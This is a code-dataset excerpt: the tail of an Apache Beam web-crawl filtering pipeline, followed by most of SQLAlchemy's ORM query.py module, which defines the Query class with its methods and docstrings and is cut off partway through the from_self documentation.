page_content |= beam.Filter(is_language, language=self.config.lang)
return page_content
def _build_pcollection(self, unused_pipeline, split, page_content, hashed_url_predicate):
def _emit_examples(el):
get_counter_inc_fn(split)("examples")
_, features = el
return (
features["url"],
{
"url": features["url"],
"text": features["text"],
"content-type": features["content-type"],
"content-length": features["content-length"],
"timestamp": features["timestamp"],
},
)
return page_content | beam.Filter(get_hashed_url_filter_fn(hashed_url_predicate)) | beam.Map(_emit_examples)
| 39.947214 | 181 | 0.62355 |
7e7c93527bba9d2d99de7d499ed3ce8ae26bffda | 161,748 | py | Python | lib/sqlalchemy/orm/query.py | leamingrad/sqlalchemy | 56fb68ca8620a211ca29b3d47d649dfa332d354a | [
"MIT"
] | null | null | null | lib/sqlalchemy/orm/query.py | leamingrad/sqlalchemy | 56fb68ca8620a211ca29b3d47d649dfa332d354a | [
"MIT"
] | null | null | null | lib/sqlalchemy/orm/query.py | leamingrad/sqlalchemy | 56fb68ca8620a211ca29b3d47d649dfa332d354a | [
"MIT"
] | null | null | null | # orm/query.py
# Copyright (C) 2005-2018 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""The Query class and support.
Defines the :class:`.Query` class, the central
construct used by the ORM to construct database queries.
The :class:`.Query` class should not be confused with the
:class:`.Select` class, which defines database
SELECT operations at the SQL (non-ORM) level. ``Query`` differs from
``Select`` in that it returns ORM-mapped objects and interacts with an
ORM session, whereas the ``Select`` construct interacts directly with the
database to return iterable result sets.
"""
from itertools import chain
from . import (
attributes, interfaces, object_mapper, persistence,
exc as orm_exc, loading
)
from .base import _entity_descriptor, _is_aliased_class, \
_is_mapped_class, _orm_columns, _generative, InspectionAttr
from .path_registry import PathRegistry
from .util import (
AliasedClass, ORMAdapter, join as orm_join, with_parent, aliased,
_entity_corresponds_to
)
from .. import sql, util, log, exc as sa_exc, inspect, inspection
from ..sql.expression import _interpret_as_from
from ..sql import (
util as sql_util,
expression, visitors
)
from ..sql.base import ColumnCollection
from . import properties
__all__ = ['Query', 'QueryContext', 'aliased']
_path_registry = PathRegistry.root
@inspection._self_inspects
@log.class_logger
class Query(object):
"""ORM-level SQL construction object.
:class:`.Query` is the source of all SELECT statements generated by the
ORM, both those formulated by end-user query operations as well as by
high level internal operations such as related collection loading. It
features a generative interface whereby successive calls return a new
:class:`.Query` object, a copy of the former with additional
criteria and options associated with it.
:class:`.Query` objects are normally initially generated using the
:meth:`~.Session.query` method of :class:`.Session`, and in
less common cases by instantiating the :class:`.Query` directly and
associating with a :class:`.Session` using the :meth:`.Query.with_session`
method.
For a full walkthrough of :class:`.Query` usage, see the
:ref:`ormtutorial_toplevel`.
"""
_only_return_tuples = False
_enable_eagerloads = True
_enable_assertions = True
_with_labels = False
_criterion = None
_yield_per = None
_order_by = False
_group_by = False
_having = None
_distinct = False
_prefixes = None
_suffixes = None
_offset = None
_limit = None
_for_update_arg = None
_statement = None
_correlate = frozenset()
_populate_existing = False
_invoke_all_eagers = True
_version_check = False
_autoflush = True
_only_load_props = None
_refresh_state = None
_refresh_identity_token = None
_from_obj = ()
_join_entities = ()
_select_from_entity = None
_mapper_adapter_map = {}
_filter_aliases = None
_from_obj_alias = None
_joinpath = _joinpoint = util.immutabledict()
_execution_options = util.immutabledict()
_params = util.immutabledict()
_attributes = util.immutabledict()
_with_options = ()
_with_hints = ()
_enable_single_crit = True
_orm_only_adapt = True
_orm_only_from_obj_alias = True
_current_path = _path_registry
_has_mapper_entities = False
lazy_loaded_from = None
"""An :class:`.InstanceState` that is using this :class:`.Query` for a
lazy load operation.
This can be used for extensions like the horizontal sharding extension
as well as event handlers and custom mapper options to determine
when a query is being used to lazy load a relationship on an object.
.. versionadded:: 1.2.9
"""
def __init__(self, entities, session=None):
"""Construct a :class:`.Query` directly.
E.g.::
q = Query([User, Address], session=some_session)
The above is equivalent to::
q = some_session.query(User, Address)
:param entities: a sequence of entities and/or SQL expressions.
:param session: a :class:`.Session` with which the :class:`.Query`
will be associated. Optional; a :class:`.Query` can be associated
with a :class:`.Session` generatively via the
:meth:`.Query.with_session` method as well.
.. seealso::
:meth:`.Session.query`
:meth:`.Query.with_session`
"""
self.session = session
self._polymorphic_adapters = {}
self._set_entities(entities)
def _set_entities(self, entities, entity_wrapper=None):
if entity_wrapper is None:
entity_wrapper = _QueryEntity
self._entities = []
self._primary_entity = None
self._has_mapper_entities = False
# 1. don't run util.to_list() or _set_entity_selectables
# if no entities were passed - major performance bottleneck
# from lazy loader implementation when it seeks to use Query
# class for an identity lookup, causes test_orm.py to fail
# with thousands of extra function calls, see issue #4228
# for why this use had to be added
# 2. can't use classmethod on Query because session.query_cls
# is an arbitrary callable in some user recipes, not
# necessarily a class, so we don't have the class available.
# see issue #4256
# 3. can't do "if entities is not None" because we usually get here
# from session.query() which takes in *entities.
# 4. can't do "if entities" because users make use of undocumented
# to_list() behavior here and they pass clause expressions that
# can't be evaluated as boolean. See issue #4269.
# 5. the empty tuple is a singleton in cPython, take advantage of this
# so that we can skip for the empty "*entities" case without using
# any Python overloadable operators.
#
if entities is not ():
for ent in util.to_list(entities):
entity_wrapper(self, ent)
self._set_entity_selectables(self._entities)
def _set_entity_selectables(self, entities):
self._mapper_adapter_map = d = self._mapper_adapter_map.copy()
for ent in entities:
for entity in ent.entities:
if entity not in d:
ext_info = inspect(entity)
if not ext_info.is_aliased_class and \
ext_info.mapper.with_polymorphic:
if ext_info.mapper.mapped_table not in \
self._polymorphic_adapters:
self._mapper_loads_polymorphically_with(
ext_info.mapper,
sql_util.ColumnAdapter(
ext_info.selectable,
ext_info.mapper._equivalent_columns
)
)
aliased_adapter = None
elif ext_info.is_aliased_class:
aliased_adapter = ext_info._adapter
else:
aliased_adapter = None
d[entity] = (
ext_info,
aliased_adapter
)
ent.setup_entity(*d[entity])
def _mapper_loads_polymorphically_with(self, mapper, adapter):
for m2 in mapper._with_polymorphic_mappers or [mapper]:
self._polymorphic_adapters[m2] = adapter
for m in m2.iterate_to_root():
self._polymorphic_adapters[m.local_table] = adapter
def _set_select_from(self, obj, set_base_alias):
fa = []
select_from_alias = None
for from_obj in obj:
info = inspect(from_obj)
if hasattr(info, 'mapper') and \
(info.is_mapper or info.is_aliased_class):
self._select_from_entity = info
if set_base_alias and not info.is_aliased_class:
raise sa_exc.ArgumentError(
"A selectable (FromClause) instance is "
"expected when the base alias is being set.")
fa.append(info.selectable)
elif not info.is_selectable:
raise sa_exc.ArgumentError(
"argument is not a mapped class, mapper, "
"aliased(), or FromClause instance.")
else:
if isinstance(from_obj, expression.SelectBase):
from_obj = from_obj.alias()
if set_base_alias:
select_from_alias = from_obj
fa.append(from_obj)
self._from_obj = tuple(fa)
if set_base_alias and \
len(self._from_obj) == 1 and \
isinstance(select_from_alias, expression.Alias):
equivs = self.__all_equivs()
self._from_obj_alias = sql_util.ColumnAdapter(
self._from_obj[0], equivs)
elif set_base_alias and \
len(self._from_obj) == 1 and \
hasattr(info, "mapper") and \
info.is_aliased_class:
self._from_obj_alias = info._adapter
def _reset_polymorphic_adapter(self, mapper):
for m2 in mapper._with_polymorphic_mappers:
self._polymorphic_adapters.pop(m2, None)
for m in m2.iterate_to_root():
self._polymorphic_adapters.pop(m.local_table, None)
def _adapt_polymorphic_element(self, element):
if "parententity" in element._annotations:
search = element._annotations['parententity']
alias = self._polymorphic_adapters.get(search, None)
if alias:
return alias.adapt_clause(element)
if isinstance(element, expression.FromClause):
search = element
elif hasattr(element, 'table'):
search = element.table
else:
return None
alias = self._polymorphic_adapters.get(search, None)
if alias:
return alias.adapt_clause(element)
def _adapt_col_list(self, cols):
return [
self._adapt_clause(
expression._literal_as_label_reference(o),
True, True)
for o in cols
]
@_generative()
def _set_lazyload_from(self, state):
self.lazy_loaded_from = state
@_generative()
def _adapt_all_clauses(self):
self._orm_only_adapt = False
def _adapt_clause(self, clause, as_filter, orm_only):
"""Adapt incoming clauses to transformations which
have been applied within this query."""
adapters = []
# do we adapt all expression elements or only those
# tagged as 'ORM' constructs ?
if not self._orm_only_adapt:
orm_only = False
if as_filter and self._filter_aliases:
for fa in self._filter_aliases._visitor_iterator:
adapters.append(
(
orm_only, fa.replace
)
)
if self._from_obj_alias:
# for the "from obj" alias, apply extra rule to the
# 'ORM only' check, if this query were generated from a
# subquery of itself, i.e. _from_selectable(), apply adaption
# to all SQL constructs.
adapters.append(
(
orm_only if self._orm_only_from_obj_alias else False,
self._from_obj_alias.replace
)
)
if self._polymorphic_adapters:
adapters.append(
(
orm_only, self._adapt_polymorphic_element
)
)
if not adapters:
return clause
def replace(elem):
for _orm_only, adapter in adapters:
# if 'orm only', look for ORM annotations
# in the element before adapting.
if not _orm_only or \
'_orm_adapt' in elem._annotations or \
"parententity" in elem._annotations:
e = adapter(elem)
if e is not None:
return e
return visitors.replacement_traverse(
clause,
{},
replace
)
def _query_entity_zero(self):
"""Return the first QueryEntity."""
return self._entities[0]
def _mapper_zero(self):
"""return the Mapper associated with the first QueryEntity."""
return self._entities[0].mapper
def _entity_zero(self):
"""Return the 'entity' (mapper or AliasedClass) associated
with the first QueryEntity, or alternatively the 'select from'
entity if specified."""
return self._select_from_entity \
if self._select_from_entity is not None \
else self._query_entity_zero().entity_zero
@property
def _mapper_entities(self):
for ent in self._entities:
if isinstance(ent, _MapperEntity):
yield ent
def _joinpoint_zero(self):
return self._joinpoint.get(
'_joinpoint_entity',
self._entity_zero()
)
def _bind_mapper(self):
ezero = self._entity_zero()
if ezero is not None:
insp = inspect(ezero)
if not insp.is_clause_element:
return insp.mapper
return None
def _only_full_mapper_zero(self, methname):
if self._entities != [self._primary_entity]:
raise sa_exc.InvalidRequestError(
"%s() can only be used against "
"a single mapped class." % methname)
return self._primary_entity.entity_zero
def _only_entity_zero(self, rationale=None):
if len(self._entities) > 1:
raise sa_exc.InvalidRequestError(
rationale or
"This operation requires a Query "
"against a single mapper."
)
return self._entity_zero()
def __all_equivs(self):
equivs = {}
for ent in self._mapper_entities:
equivs.update(ent.mapper._equivalent_columns)
return equivs
def _get_condition(self):
return self._no_criterion_condition(
"get", order_by=False, distinct=False)
def _get_existing_condition(self):
self._no_criterion_assertion("get", order_by=False, distinct=False)
def _no_criterion_assertion(self, meth, order_by=True, distinct=True):
if not self._enable_assertions:
return
if self._criterion is not None or \
self._statement is not None or self._from_obj or \
self._limit is not None or self._offset is not None or \
self._group_by or (order_by and self._order_by) or \
(distinct and self._distinct):
raise sa_exc.InvalidRequestError(
"Query.%s() being called on a "
"Query with existing criterion. " % meth)
def _no_criterion_condition(self, meth, order_by=True, distinct=True):
self._no_criterion_assertion(meth, order_by, distinct)
self._from_obj = ()
self._statement = self._criterion = None
self._order_by = self._group_by = self._distinct = False
def _no_clauseelement_condition(self, meth):
if not self._enable_assertions:
return
if self._order_by:
raise sa_exc.InvalidRequestError(
"Query.%s() being called on a "
"Query with existing criterion. " % meth)
self._no_criterion_condition(meth)
def _no_statement_condition(self, meth):
if not self._enable_assertions:
return
if self._statement is not None:
raise sa_exc.InvalidRequestError(
("Query.%s() being called on a Query with an existing full "
"statement - can't apply criterion.") % meth)
def _no_limit_offset(self, meth):
if not self._enable_assertions:
return
if self._limit is not None or self._offset is not None:
raise sa_exc.InvalidRequestError(
"Query.%s() being called on a Query which already has LIMIT "
"or OFFSET applied. To modify the row-limited results of a "
" Query, call from_self() first. "
"Otherwise, call %s() before limit() or offset() "
"are applied."
% (meth, meth)
)
def _get_options(self, populate_existing=None,
version_check=None,
only_load_props=None,
refresh_state=None,
identity_token=None):
if populate_existing:
self._populate_existing = populate_existing
if version_check:
self._version_check = version_check
if refresh_state:
self._refresh_state = refresh_state
if only_load_props:
self._only_load_props = set(only_load_props)
if identity_token:
self._refresh_identity_token = identity_token
return self
def _clone(self):
cls = self.__class__
q = cls.__new__(cls)
q.__dict__ = self.__dict__.copy()
return q
@property
def statement(self):
"""The full SELECT statement represented by this Query.
The statement by default will not have disambiguating labels
applied to the construct unless with_labels(True) is called
first.
"""
stmt = self._compile_context(labels=self._with_labels).\
statement
if self._params:
stmt = stmt.params(self._params)
return stmt
def subquery(self, name=None, with_labels=False, reduce_columns=False):
"""return the full SELECT statement represented by
this :class:`.Query`, embedded within an :class:`.Alias`.
Eager JOIN generation within the query is disabled.
:param name: string name to be assigned as the alias;
this is passed through to :meth:`.FromClause.alias`.
If ``None``, a name will be deterministically generated
at compile time.
:param with_labels: if True, :meth:`.with_labels` will be called
on the :class:`.Query` first to apply table-qualified labels
to all columns.
:param reduce_columns: if True, :meth:`.Select.reduce_columns` will
be called on the resulting :func:`.select` construct,
to remove same-named columns where one also refers to the other
via foreign key or WHERE clause equivalence.
.. versionchanged:: 0.8 the ``with_labels`` and ``reduce_columns``
keyword arguments were added.
"""
q = self.enable_eagerloads(False)
if with_labels:
q = q.with_labels()
q = q.statement
if reduce_columns:
q = q.reduce_columns()
return q.alias(name=name)
def cte(self, name=None, recursive=False):
r"""Return the full SELECT statement represented by this
:class:`.Query` represented as a common table expression (CTE).
Parameters and usage are the same as those of the
:meth:`.SelectBase.cte` method; see that method for
further details.
Here is the `PostgreSQL WITH
RECURSIVE example
<http://www.postgresql.org/docs/8.4/static/queries-with.html>`_.
Note that, in this example, the ``included_parts`` cte and the
``incl_alias`` alias of it are Core selectables, which
means the columns are accessed via the ``.c.`` attribute. The
``parts_alias`` object is an :func:`.orm.aliased` instance of the
``Part`` entity, so column-mapped attributes are available
directly::
from sqlalchemy.orm import aliased
class Part(Base):
__tablename__ = 'part'
part = Column(String, primary_key=True)
sub_part = Column(String, primary_key=True)
quantity = Column(Integer)
included_parts = session.query(
Part.sub_part,
Part.part,
Part.quantity).\
filter(Part.part=="our part").\
cte(name="included_parts", recursive=True)
incl_alias = aliased(included_parts, name="pr")
parts_alias = aliased(Part, name="p")
included_parts = included_parts.union_all(
session.query(
parts_alias.sub_part,
parts_alias.part,
parts_alias.quantity).\
filter(parts_alias.part==incl_alias.c.sub_part)
)
q = session.query(
included_parts.c.sub_part,
func.sum(included_parts.c.quantity).
label('total_quantity')
).\
group_by(included_parts.c.sub_part)
.. seealso::
:meth:`.HasCTE.cte`
"""
return self.enable_eagerloads(False).\
statement.cte(name=name, recursive=recursive)
def label(self, name):
"""Return the full SELECT statement represented by this
:class:`.Query`, converted
to a scalar subquery with a label of the given name.
Analogous to :meth:`sqlalchemy.sql.expression.SelectBase.label`.
.. versionadded:: 0.6.5
"""
return self.enable_eagerloads(False).statement.label(name)
def as_scalar(self):
"""Return the full SELECT statement represented by this
:class:`.Query`, converted to a scalar subquery.
Analogous to :meth:`sqlalchemy.sql.expression.SelectBase.as_scalar`.
.. versionadded:: 0.6.5
"""
return self.enable_eagerloads(False).statement.as_scalar()
@property
def selectable(self):
"""Return the :class:`.Select` object emitted by this :class:`.Query`.
Used for :func:`.inspect` compatibility, this is equivalent to::
query.enable_eagerloads(False).with_labels().statement
"""
return self.__clause_element__()
def __clause_element__(self):
return self.enable_eagerloads(False).with_labels().statement
@_generative()
def only_return_tuples(self, value):
"""When set to True, the query results will always be a tuple,
specifically for single element queries. The default is False.
. .. versionadded:: 1.2.5
"""
self._only_return_tuples = value
@_generative()
def enable_eagerloads(self, value):
"""Control whether or not eager joins and subqueries are
rendered.
When set to False, the returned Query will not render
eager joins regardless of :func:`~sqlalchemy.orm.joinedload`,
:func:`~sqlalchemy.orm.subqueryload` options
or mapper-level ``lazy='joined'``/``lazy='subquery'``
configurations.
This is used primarily when nesting the Query's
statement into a subquery or other
selectable, or when using :meth:`.Query.yield_per`.
"""
self._enable_eagerloads = value
def _no_yield_per(self, message):
raise sa_exc.InvalidRequestError(
"The yield_per Query option is currently not "
"compatible with %s eager loading. Please "
"specify lazyload('*') or query.enable_eagerloads(False) in "
"order to "
"proceed with query.yield_per()." % message)
@_generative()
def with_labels(self):
"""Apply column labels to the return value of Query.statement.
Indicates that this Query's `statement` accessor should return
a SELECT statement that applies labels to all columns in the
form <tablename>_<columnname>; this is commonly used to
disambiguate columns from multiple tables which have the same
name.
When the `Query` actually issues SQL to load rows, it always
uses column labeling.
.. note:: The :meth:`.Query.with_labels` method *only* applies
the output of :attr:`.Query.statement`, and *not* to any of
the result-row invoking systems of :class:`.Query` itself, e.g.
:meth:`.Query.first`, :meth:`.Query.all`, etc. To execute
a query using :meth:`.Query.with_labels`, invoke the
:attr:`.Query.statement` using :meth:`.Session.execute`::
result = session.execute(query.with_labels().statement)
"""
self._with_labels = True
@_generative()
def enable_assertions(self, value):
"""Control whether assertions are generated.
When set to False, the returned Query will
not assert its state before certain operations,
including that LIMIT/OFFSET has not been applied
when filter() is called, no criterion exists
when get() is called, and no "from_statement()"
exists when filter()/order_by()/group_by() etc.
is called. This more permissive mode is used by
custom Query subclasses to specify criterion or
other modifiers outside of the usual usage patterns.
Care should be taken to ensure that the usage
pattern is even possible. A statement applied
by from_statement() will override any criterion
set by filter() or order_by(), for example.
"""
self._enable_assertions = value
@property
def whereclause(self):
"""A readonly attribute which returns the current WHERE criterion for
this Query.
This returned value is a SQL expression construct, or ``None`` if no
criterion has been established.
"""
return self._criterion
@_generative()
def _with_current_path(self, path):
"""indicate that this query applies to objects loaded
within a certain path.
Used by deferred loaders (see strategies.py) which transfer
query options from an originating query to a newly generated
query intended for the deferred load.
"""
self._current_path = path
@_generative(_no_clauseelement_condition)
def with_polymorphic(self,
cls_or_mappers,
selectable=None,
polymorphic_on=None):
"""Load columns for inheriting classes.
:meth:`.Query.with_polymorphic` applies transformations
to the "main" mapped class represented by this :class:`.Query`.
The "main" mapped class here means the :class:`.Query`
object's first argument is a full class, i.e.
``session.query(SomeClass)``. These transformations allow additional
tables to be present in the FROM clause so that columns for a
joined-inheritance subclass are available in the query, both for the
purposes of load-time efficiency as well as the ability to use
these columns at query time.
See the documentation section :ref:`with_polymorphic` for
details on how this method is used.
.. versionchanged:: 0.8
A new and more flexible function
:func:`.orm.with_polymorphic` supersedes
:meth:`.Query.with_polymorphic`, as it can apply the equivalent
functionality to any set of columns or classes in the
:class:`.Query`, not just the "zero mapper". See that
function for a description of arguments.
"""
if not self._primary_entity:
raise sa_exc.InvalidRequestError(
"No primary mapper set up for this Query.")
entity = self._entities[0]._clone()
self._entities = [entity] + self._entities[1:]
entity.set_with_polymorphic(self,
cls_or_mappers,
selectable=selectable,
polymorphic_on=polymorphic_on)
@_generative()
def yield_per(self, count):
r"""Yield only ``count`` rows at a time.
The purpose of this method is when fetching very large result sets
(> 10K rows), to batch results in sub-collections and yield them
out partially, so that the Python interpreter doesn't need to declare
very large areas of memory which is both time consuming and leads
to excessive memory use. The performance from fetching hundreds of
thousands of rows can often double when a suitable yield-per setting
(e.g. approximately 1000) is used, even with DBAPIs that buffer
rows (which are most).
The :meth:`.Query.yield_per` method **is not compatible
subqueryload eager loading or joinedload eager loading when
using collections**. It is potentially compatible with "select in"
eager loading, **provided the databse driver supports multiple,
independent cursors** (pysqlite and psycopg2 are known to work,
MySQL and SQL Server ODBC drivers do not).
Therefore in some cases, it may be helpful to disable
eager loads, either unconditionally with
:meth:`.Query.enable_eagerloads`::
q = sess.query(Object).yield_per(100).enable_eagerloads(False)
Or more selectively using :func:`.lazyload`; such as with
an asterisk to specify the default loader scheme::
q = sess.query(Object).yield_per(100).\
options(lazyload('*'), joinedload(Object.some_related))
.. warning::
Use this method with caution; if the same instance is
present in more than one batch of rows, end-user changes
to attributes will be overwritten.
In particular, it's usually impossible to use this setting
with eagerly loaded collections (i.e. any lazy='joined' or
'subquery') since those collections will be cleared for a
new load when encountered in a subsequent result batch.
In the case of 'subquery' loading, the full result for all
rows is fetched which generally defeats the purpose of
:meth:`~sqlalchemy.orm.query.Query.yield_per`.
Also note that while
:meth:`~sqlalchemy.orm.query.Query.yield_per` will set the
``stream_results`` execution option to True, currently
this is only understood by
:mod:`~sqlalchemy.dialects.postgresql.psycopg2`,
:mod:`~sqlalchemy.dialects.mysql.mysqldb` and
:mod:`~sqlalchemy.dialects.mysql.pymysql` dialects
which will stream results using server side cursors
instead of pre-buffer all rows for this query. Other
DBAPIs **pre-buffer all rows** before making them
available. The memory use of raw database rows is much less
than that of an ORM-mapped object, but should still be taken into
consideration when benchmarking.
.. seealso::
:meth:`.Query.enable_eagerloads`
"""
self._yield_per = count
self._execution_options = self._execution_options.union(
{"stream_results": True,
"max_row_buffer": count})
def get(self, ident):
"""Return an instance based on the given primary key identifier,
or ``None`` if not found.
E.g.::
my_user = session.query(User).get(5)
some_object = session.query(VersionedFoo).get((5, 10))
:meth:`~.Query.get` is special in that it provides direct
access to the identity map of the owning :class:`.Session`.
If the given primary key identifier is present
in the local identity map, the object is returned
directly from this collection and no SQL is emitted,
unless the object has been marked fully expired.
If not present,
a SELECT is performed in order to locate the object.
:meth:`~.Query.get` also will perform a check if
the object is present in the identity map and
marked as expired - a SELECT
is emitted to refresh the object as well as to
ensure that the row is still present.
If not, :class:`~sqlalchemy.orm.exc.ObjectDeletedError` is raised.
:meth:`~.Query.get` is only used to return a single
mapped instance, not multiple instances or
individual column constructs, and strictly
on a single primary key value. The originating
:class:`.Query` must be constructed in this way,
i.e. against a single mapped entity,
with no additional filtering criterion. Loading
options via :meth:`~.Query.options` may be applied
however, and will be used if the object is not
yet locally present.
A lazy-loading, many-to-one attribute configured
by :func:`.relationship`, using a simple
foreign-key-to-primary-key criterion, will also use an
operation equivalent to :meth:`~.Query.get` in order to retrieve
the target value from the local identity map
before querying the database. See :doc:`/orm/loading_relationships`
for further details on relationship loading.
:param ident: A scalar or tuple value representing
the primary key. For a composite primary key,
the order of identifiers corresponds in most cases
to that of the mapped :class:`.Table` object's
primary key columns. For a :func:`.mapper` that
was given the ``primary key`` argument during
construction, the order of identifiers corresponds
to the elements present in this collection.
:return: The object instance, or ``None``.
"""
return self._get_impl(
ident, loading.load_on_pk_identity)
def _identity_lookup(self, mapper, primary_key_identity,
identity_token=None, passive=attributes.PASSIVE_OFF,
lazy_loaded_from=None):
"""Locate an object in the identity map.
Given a primary key identity, constructs an identity key and then
looks in the session's identity map. If present, the object may
be run through unexpiration rules (e.g. load unloaded attributes,
check if was deleted).
For performance reasons, while the :class:`.Query` must be
instantiated, it may be instantiated with no entities, and the
mapper is passed::
obj = session.query()._identity_lookup(inspect(SomeClass), (1, ))
:param mapper: mapper in use
:param primary_key_identity: the primary key we are searching for, as
a tuple.
:param identity_token: identity token that should be used to create
the identity key. Used as is, however overriding subclasses can
repurpose this in order to interpret the value in a special way,
such as if None then look among multple target tokens.
:param passive: passive load flag passed to
:func:`.loading.get_from_identity`, which impacts the behavior if
the object is found; the object may be validated and/or unexpired
if the flag allows for SQL to be emitted.
:param lazy_loaded_from: an :class:`.InstanceState` that is
specifically asking for this identity as a related identity. Used
for sharding schemes where there is a correspondence between an object
and a related object being lazy-loaded (or otherwise
relationship-loaded).
.. versionadded:: 1.2.9
:return: None if the object is not found in the identity map, *or*
if the object was unexpired and found to have been deleted.
if passive flags disallow SQL and the object is expired, returns
PASSIVE_NO_RESULT. In all other cases the instance is returned.
.. versionadded:: 1.2.7
"""
key = mapper.identity_key_from_primary_key(
primary_key_identity, identity_token=identity_token)
return loading.get_from_identity(
self.session, key, passive)
def _get_impl(
self, primary_key_identity, db_load_fn, identity_token=None):
# convert composite types to individual args
if hasattr(primary_key_identity, '__composite_values__'):
primary_key_identity = primary_key_identity.__composite_values__()
primary_key_identity = util.to_list(primary_key_identity)
mapper = self._only_full_mapper_zero("get")
if len(primary_key_identity) != len(mapper.primary_key):
raise sa_exc.InvalidRequestError(
"Incorrect number of values in identifier to formulate "
"primary key for query.get(); primary key columns are %s" %
','.join("'%s'" % c for c in mapper.primary_key))
if not self._populate_existing and \
not mapper.always_refresh and \
self._for_update_arg is None:
instance = self._identity_lookup(
mapper, primary_key_identity,
identity_token=identity_token)
if instance is not None:
self._get_existing_condition()
# reject calls for id in identity map but class
# mismatch.
if not issubclass(instance.__class__, mapper.class_):
return None
return instance
return db_load_fn(self, primary_key_identity)
@_generative()
def correlate(self, *args):
"""Return a :class:`.Query` construct which will correlate the given
FROM clauses to that of an enclosing :class:`.Query` or
:func:`~.expression.select`.
The method here accepts mapped classes, :func:`.aliased` constructs,
and :func:`.mapper` constructs as arguments, which are resolved into
expression constructs, in addition to appropriate expression
constructs.
The correlation arguments are ultimately passed to
:meth:`.Select.correlate` after coercion to expression constructs.
The correlation arguments take effect in such cases
as when :meth:`.Query.from_self` is used, or when
a subquery as returned by :meth:`.Query.subquery` is
embedded in another :func:`~.expression.select` construct.
"""
for s in args:
if s is None:
self._correlate = self._correlate.union([None])
else:
self._correlate = self._correlate.union(
sql_util.surface_selectables(_interpret_as_from(s))
)
@_generative()
def autoflush(self, setting):
"""Return a Query with a specific 'autoflush' setting.
Note that a Session with autoflush=False will
not autoflush, even if this flag is set to True at the
Query level. Therefore this flag is usually used only
to disable autoflush for a specific Query.
"""
self._autoflush = setting
@_generative()
def populate_existing(self):
"""Return a :class:`.Query` that will expire and refresh all instances
as they are loaded, or reused from the current :class:`.Session`.
:meth:`.populate_existing` does not improve behavior when
the ORM is used normally - the :class:`.Session` object's usual
behavior of maintaining a transaction and expiring all attributes
after rollback or commit handles object state automatically.
This method is not intended for general use.
"""
self._populate_existing = True
@_generative()
def _with_invoke_all_eagers(self, value):
"""Set the 'invoke all eagers' flag which causes joined- and
subquery loaders to traverse into already-loaded related objects
and collections.
Default is that of :attr:`.Query._invoke_all_eagers`.
"""
self._invoke_all_eagers = value
def with_parent(self, instance, property=None, from_entity=None):
"""Add filtering criterion that relates the given instance
to a child object or collection, using its attribute state
as well as an established :func:`.relationship()`
configuration.
The method uses the :func:`.with_parent` function to generate
the clause, the result of which is passed to :meth:`.Query.filter`.
Parameters are the same as :func:`.with_parent`, with the exception
that the given property can be None, in which case a search is
performed against this :class:`.Query` object's target mapper.
:param instance:
An instance which has some :func:`.relationship`.
:param property:
String property name, or class-bound attribute, which indicates
what relationship from the instance should be used to reconcile the
parent/child relationship.
:param from_entity:
Entity in which to consider as the left side. This defaults to the
"zero" entity of the :class:`.Query` itself.
"""
if from_entity:
entity_zero = inspect(from_entity)
else:
entity_zero = self._entity_zero()
if property is None:
mapper = object_mapper(instance)
for prop in mapper.iterate_properties:
if isinstance(prop, properties.RelationshipProperty) and \
prop.mapper is entity_zero.mapper:
property = prop
break
else:
raise sa_exc.InvalidRequestError(
"Could not locate a property which relates instances "
"of class '%s' to instances of class '%s'" %
(
entity_zero.mapper.class_.__name__,
instance.__class__.__name__)
)
return self.filter(with_parent(instance, property, entity_zero.entity))
@_generative()
def add_entity(self, entity, alias=None):
"""add a mapped entity to the list of result columns
to be returned."""
if alias is not None:
entity = aliased(entity, alias)
self._entities = list(self._entities)
m = _MapperEntity(self, entity)
self._set_entity_selectables([m])
@_generative()
def with_session(self, session):
"""Return a :class:`.Query` that will use the given :class:`.Session`.
While the :class:`.Query` object is normally instantiated using the
:meth:`.Session.query` method, it is legal to build the :class:`.Query`
directly without necessarily using a :class:`.Session`. Such a
:class:`.Query` object, or any :class:`.Query` already associated
with a different :class:`.Session`, can produce a new :class:`.Query`
object associated with a target session using this method::
from sqlalchemy.orm import Query
query = Query([MyClass]).filter(MyClass.id == 5)
result = query.with_session(my_session).one()
"""
self.session = session
def from_self(self, *entities):
r"""return a Query that selects from this Query's
SELECT statement.
:meth:`.Query.from_self` essentially turns the SELECT statement
into a SELECT of itself. Given a query such as::
q = session.query(User).filter(User.name.like('e%'))
Given the :meth:`.Query.from_self` version::
q = session.query(User).filter(User.name.like('e%')).from_self()
This query renders as:
.. sourcecode:: sql
SELECT anon_1.user_id AS anon_1_user_id,
anon_1.user_name AS anon_1_user_name
FROM (SELECT "user".id AS user_id, "user".name AS user_name
FROM "user"
WHERE "user".name LIKE :name_1) AS anon_1
There are lots of cases where :meth:`.Query.from_self` may be useful.
A simple one is where above, we may want to apply a row LIMIT to
the set of user objects we query against, and then apply additional
joins against that row-limited set::
q = session.query(User).filter(User.name.like('e%')).\
limit(5).from_self().\
join(User.addresses).filter(Address.email.like('q%'))
The above query joins to the ``Address`` entity but only against the
first five results of the ``User`` query:
.. sourcecode:: sql
SELECT anon_1.user_id AS anon_1_user_id,
anon_1.user_name AS anon_1_user_name
FROM (SELECT "user".id AS user_id, "user".name AS user_name
FROM "user"
WHERE "user".name LIKE :name_1
LIMIT :param_1) AS anon_1
JOIN address ON anon_1.user_id = address.user_id
WHERE address.email LIKE :email_1
**Automatic Aliasing**
Another key behavior of :meth:`.Query.from_self` is that it applies
**automatic aliasing** to the entities inside the subquery, when
they are referenced on the outside. Above, if we continue to
refer to the ``User`` entity without any additional aliasing applied
to it, those references wil be in terms of the subquery::
q = session.query(User).filter(User.name.like('e%')).\
limit(5).from_self().\
join(User.addresses).filter(Address.email.like('q%')).\
order_by(User.name)
The ORDER BY against ``User.name`` is aliased to be in terms of the
inner subquery:
.. sourcecode:: sql
SELECT anon_1.user_id AS anon_1_user_id,
anon_1.user_name AS anon_1_user_name
FROM (SELECT "user".id AS user_id, "user".name AS user_name
FROM "user"
WHERE "user".name LIKE :name_1
LIMIT :param_1) AS anon_1
JOIN address ON anon_1.user_id = address.user_id
WHERE address.email LIKE :email_1 ORDER BY anon_1.user_name
The automatic aliasing feature only works in a **limited** way,
for simple filters and orderings. More ambitious constructions
such as referring to the entity in joins should prefer to use
explicit subquery objects, typically making use of the
:meth:`.Query.subquery` method to produce an explicit subquery object.
Always test the structure of queries by viewing the SQL to ensure
a particular structure does what's expected!
**Changing the Entities**
:meth:`.Query.from_self` also includes the ability to modify what
columns are being queried. In our example, we want ``User.id``
to be queried by the inner query, so that we can join to the
``Address`` entity on the outside, but we only wanted the outer
